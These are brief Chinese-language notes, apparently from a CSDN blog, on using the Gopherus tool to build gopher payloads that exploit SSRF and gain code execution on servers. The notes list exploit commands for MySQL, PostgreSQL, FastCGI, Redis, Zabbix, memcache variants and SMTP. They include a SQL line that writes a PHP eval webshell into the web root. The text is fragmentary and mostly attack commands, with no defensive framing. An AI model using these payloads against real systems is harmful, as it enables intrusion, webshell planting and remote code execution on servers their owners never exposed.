GitHub - tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
Gopherus工具的下载、使用-CSDN博客
用python2运行即可
记得对生成后payload下划线后面的部分进行url编码
python2 gopherus.py --exploit mysql
root #用户名
select "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/webshell.php';
参考案例 15.SSRF
python2 gopherus.py --exploit pstgresql
gopherus --exploit fastcgi
gopherus --exploit redis
案例 15.SSRF
gopherus --exploit zabbix
gopherus --exploit pymemcache
gopherus --exploit rbmemcache
gopherus --exploit phpmemcache
gopherus --exploit dmpmemcache
发送邮件
gopherus --exploit smtp